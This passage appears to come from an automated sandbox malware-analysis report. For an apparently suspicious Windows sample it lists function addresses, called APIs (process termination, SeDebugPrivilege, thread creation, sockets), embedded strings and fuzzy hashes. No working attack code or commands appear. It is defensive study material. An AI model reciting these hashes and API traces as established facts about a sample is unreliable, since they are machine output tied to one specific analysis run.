                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: cd93619ce1ea6741e98088b46d3be41aa3c3fd2c10ca79d3036df51a233ce1f8
                                                            • Instruction ID: a3e88cabdfdea55bbb0f066665949fa4f2caeb637ef91bc8a538778b2cae3592
                                                            • Opcode Fuzzy Hash: cd93619ce1ea6741e98088b46d3be41aa3c3fd2c10ca79d3036df51a233ce1f8
                                                            • Instruction Fuzzy Hash: EF514674601209EFDB24EF68CC45BAA77A9FF58320F104629F906D72A0DB70E9A0DB50
                                                            Function 00868E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00868A84,00000B00,?,?), ref: 00868E0C
                                                            • HeapAlloc.KERNEL32(00000000,?,00868A84,00000B00,?,?), ref: 00868E13
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00868A84,00000B00,?,?), ref: 00868E28
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00868A84,00000B00,?,?), ref: 00868E30
                                                            • DuplicateHandle.KERNEL32(00000000,?,00868A84,00000B00,?,?), ref: 00868E33
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00868A84,00000B00,?,?), ref: 00868E43
                                                            • GetCurrentProcess.KERNEL32(00868A84,00000000,?,00868A84,00000B00,?,?), ref: 00868E4B
                                                            • DuplicateHandle.KERNEL32(00000000,?,00868A84,00000B00,?,?), ref: 00868E4E
                                                            • CreateThread.KERNEL32(00000000,00000000,00868E74,00000000,00000000,00000000), ref: 00868E68
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 32950ff32115fe9eda3eead8cfe875d8a2185cba00afbe2aa7fa413297e43ac6
                                                            • Instruction ID: 45c05386f4aa1c88ab0a78dffffcc70d1e73ac80841a4c76d2eec207b22b6ae6
                                                            • Opcode Fuzzy Hash: 32950ff32115fe9eda3eead8cfe875d8a2185cba00afbe2aa7fa413297e43ac6
                                                            • Instruction Fuzzy Hash: D801A8B5240308FFE611ABA5DC49F6B3BACFB89711F154422FB05DB2A2CA759800CA64
                                                            Function 00889428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-625585964
                                                            • Opcode ID: bdc10796d22c6e96566429146a693430e595f487ada23dec8e5bd6e998c0e0f2
                                                            • Instruction ID: b6f49aa18f52d4772353a94ed3d3e7a9d30c3555d975095cb9a41fe0c3224f05
                                                            • Opcode Fuzzy Hash: bdc10796d22c6e96566429146a693430e595f487ada23dec8e5bd6e998c0e0f2
                                                            • Instruction Fuzzy Hash: 0691AF70A00219ABDF24EFA5C844FAEB7B8FF85724F188159F555EB280E7709945CFA0
                                                            Function 00889A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00867652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?,?,0086799D), ref: 0086766F
                                                              • Part of subcall function 00867652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 0086768A
                                                              • Part of subcall function 00867652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 00867698
                                                              • Part of subcall function 00867652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?), ref: 008676A8
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00889B1B
                                                            • _memset.LIBCMT ref: 00889B28
                                                            • _memset.LIBCMT ref: 00889C6B
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00889C97
                                                            • CoTaskMemFree.OLE32(?), ref: 00889CA2
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 00889CF0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: 2d5597c184745fa4d9415b8a60912d6c52ab262dae08f44cfa6b98a768c2fbac
                                                            • Instruction ID: 1d619aa8286d3061fcd74aa92b2cb4f97aaba4eb30c4d2ad5abb0670afdfc13b
                                                            • Opcode Fuzzy Hash: 2d5597c184745fa4d9415b8a60912d6c52ab262dae08f44cfa6b98a768c2fbac
                                                            • Instruction Fuzzy Hash: E7912971D00229EBDB10EFA4DC85AEEBBB9FF08710F24415AE519E7281DB715A44CFA1
                                                            Function 00896FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00897093
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 008970A7
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008970C1
                                                            • _wcscat.LIBCMT ref: 0089711C
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00897133
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00897161
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: e1d3842e3ef1a370addffadec106d60260292df31b04d8c969bf8c112c981266
                                                            • Instruction ID: 3ebda62776269db7cbbfcc428f29b3aa83c85e2634321bf666173bedfc068b85
                                                            • Opcode Fuzzy Hash: e1d3842e3ef1a370addffadec106d60260292df31b04d8c969bf8c112c981266
                                                            • Instruction Fuzzy Hash: 2F41A271A14308AFEF21AF64CC85BEE77A8FF08354F14052AFA54E7292D7729D848B50
                                                            Function 0088EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00873E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00873EB6
                                                              • Part of subcall function 00873E91: Process32FirstW.KERNEL32(00000000,?), ref: 00873EC4
                                                              • Part of subcall function 00873E91: CloseHandle.KERNEL32(00000000), ref: 00873F8E
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0088ECB8
                                                            • GetLastError.KERNEL32 ref: 0088ECCB
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0088ECFA
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0088ED77
                                                            • GetLastError.KERNEL32(00000000), ref: 0088ED82
                                                            • CloseHandle.KERNEL32(00000000), ref: 0088EDB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 4fbafb7b9dffe863fb52f94684246b6ff2eb98027dcdf2d28b7fee53563504a0
                                                            • Instruction ID: a83d4be8ef57443e73d5d2a5da2c4d6fcf9fd5c948653e020c88292229a18fab
                                                            • Opcode Fuzzy Hash: 4fbafb7b9dffe863fb52f94684246b6ff2eb98027dcdf2d28b7fee53563504a0
                                                            • Instruction Fuzzy Hash: FC41A9712002109FDB14EF28CC95F6EB7A5FF80714F088019F986DB2C2DB74A848CB96
                                                            Function 00873226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 008732C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: afe0ebc63ab788459efb1a42ba482ef315687ed5980c1173b5d72cc062e00353
                                                            • Instruction ID: 5231599d3e0fec11e95fe50fc2091cdb36b38e5462eb9c77ad52af2dbdd44f61
                                                            • Opcode Fuzzy Hash: afe0ebc63ab788459efb1a42ba482ef315687ed5980c1173b5d72cc062e00353
                                                            • Instruction Fuzzy Hash: 31115B3124835ABA9B055A54DC42DAEB3ACFF19375F10402AF508E6283D675DB0016E7
                                                            Function 00874534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0087454E
                                                            • LoadStringW.USER32(00000000), ref: 00874555
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0087456B
                                                            • LoadStringW.USER32(00000000), ref: 00874572
                                                            • _wprintf.LIBCMT ref: 00874598
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008745B6
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00874593
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: a1882ad1d2b6e32008ef8219450b3f7e07633bffea71bdd71a0be5aa390e153e
                                                            • Instruction ID: 1c8e1b07d5c1dbbef77bcf2862cf76553ed78525ed05c084e59047809ef1635f
                                                            • Opcode Fuzzy Hash: a1882ad1d2b6e32008ef8219450b3f7e07633bffea71bdd71a0be5aa390e153e
                                                            • Instruction Fuzzy Hash: E00167F3500208BFE715A794DD89EF7776CFB08301F0405A6B749D2152E6749E858B71
                                                            Function 0089D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0089D78A
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0089D7AA
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0089D9E5
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0089DA03
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0089DA24
                                                            • ShowWindow.USER32(00000003,00000000), ref: 0089DA43
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0089DA68
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0089DA8B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 3da68da9381fb6ee8afd91093402d762a22fca6b52f1cb7cf474310a1517a808
                                                            • Instruction ID: 5c177dea7790d74ffdbae2be58c472d110f3d689f56cf6dda2051ac91471434d
                                                            • Opcode Fuzzy Hash: 3da68da9381fb6ee8afd91093402d762a22fca6b52f1cb7cf474310a1517a808
                                                            • Instruction Fuzzy Hash: D8B19931600229AFDF18EF69C9857AD7BF1FF04700F08816AED48DB296D734A960CB54
                                                            Function 00812A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0084C417,00000004,00000000,00000000,00000000), ref: 00812ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0084C417,00000004,00000000,00000000,00000000,000000FF), ref: 00812B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0084C417,00000004,00000000,00000000,00000000), ref: 0084C46A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0084C417,00000004,00000000,00000000,00000000), ref: 0084C4D6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: a9455f7eccd81f556f040e6635d124f360fd0f15974409ea77f33c6a5ac61ed4
                                                            • Instruction ID: b20b86966806e631c7cbeef58ce7ba280c8a118b7f03c36f5b3e9c38f2e1a566
                                                            • Opcode Fuzzy Hash: a9455f7eccd81f556f040e6635d124f360fd0f15974409ea77f33c6a5ac61ed4
                                                            • Instruction Fuzzy Hash: F6415930208398ABC7399B288D98BFE7B9EFF55314F18881EE147C6561D635A8E1D720
                                                            Function 00877368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0087737F
                                                              • Part of subcall function 00830FF6: std::exception::exception.LIBCMT ref: 0083102C
                                                              • Part of subcall function 00830FF6: __CxxThrowException@8.LIBCMT ref: 00831041
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008773B6
                                                            • EnterCriticalSection.KERNEL32(?), ref: 008773D2
                                                            • _memmove.LIBCMT ref: 00877420
                                                            • _memmove.LIBCMT ref: 0087743D
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0087744C
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00877461
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00877480
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: 8e814aae146d5972b31b3c01ca30d5676a087a59b10bd9416e5f54b1376add57
                                                            • Instruction ID: fee27baa9f84088b1a0ccca1c5674c5834ac0255d657b7ddb14bc27795e90537
                                                            • Opcode Fuzzy Hash: 8e814aae146d5972b31b3c01ca30d5676a087a59b10bd9416e5f54b1376add57
                                                            • Instruction Fuzzy Hash: EF317031904205EBCF14EF98DD85AAE7BB8FF84710F1441A6F904EB256DB30DA10CBA5
                                                            Function 00896442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 0089645A
                                                            • GetDC.USER32(00000000), ref: 00896462
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0089646D
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00896479
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008964B5
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008964C6
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00899299,?,?,000000FF,00000000,?,000000FF,?), ref: 00896500
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00896520
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 9b9a62d5b34d994ddc32904e74069d363a2f2fad7c455fbda9bbd7004ab8b804
                                                            • Instruction ID: 5d4a269b6747bf65d11237e030fff4e757cfba8bd90b6dd7b13b196ffb7a9533
                                                            • Opcode Fuzzy Hash: 9b9a62d5b34d994ddc32904e74069d363a2f2fad7c455fbda9bbd7004ab8b804
                                                            • Instruction Fuzzy Hash: 7B318B72200210BFEF159F50CC8AFEA3FA9FF09761F080066FE08DA296D6759851CB64
                                                            Function 0086C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: dd2d9c27993ad5cf6a289a3567dcdfe82b5c28fd15453952b714aad73d5db4f6
                                                            • Instruction ID: c946e7a2cb6bb1c2f57978aee4c2ae3b69e7332dfd77b5d13f59bc890fe6f10b
                                                            • Opcode Fuzzy Hash: dd2d9c27993ad5cf6a289a3567dcdfe82b5c28fd15453952b714aad73d5db4f6
                                                            • Instruction Fuzzy Hash: 7221C261600609BBE620A6299C47FBB339CFF627A8F050020FD46D6783F755DE1182E7
                                                            Function 0087ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                              • Part of subcall function 0082FEC6: _wcscpy.LIBCMT ref: 0082FEE9
                                                            • _wcstok.LIBCMT ref: 0087EEFF
                                                            • _wcscpy.LIBCMT ref: 0087EF8E
                                                            • _memset.LIBCMT ref: 0087EFC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: dda65016612ed001eac62a92ffd57bea9c4bb3593a8fb2caa446284ed367463f
                                                            • Instruction ID: 4c3de976a2148073e58eab91beca6d6a4ef888352ab78b4173dafaa9b3208b5c
                                                            • Opcode Fuzzy Hash: dda65016612ed001eac62a92ffd57bea9c4bb3593a8fb2caa446284ed367463f
                                                            • Instruction Fuzzy Hash: 9AC14B716087409FC724EF28C895A9AB7E4FF84310F04896DF999D72A2DB30E945CB93
                                                            Function 00886E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00886F14
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00886F35
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886F48
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00886FFE
                                                            • inet_ntoa.WSOCK32(?), ref: 00886FBB
                                                              • Part of subcall function 0086AE14: _strlen.LIBCMT ref: 0086AE1E
                                                              • Part of subcall function 0086AE14: _memmove.LIBCMT ref: 0086AE40
                                                            • _strlen.LIBCMT ref: 00887058
                                                            • _memmove.LIBCMT ref: 008870C1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
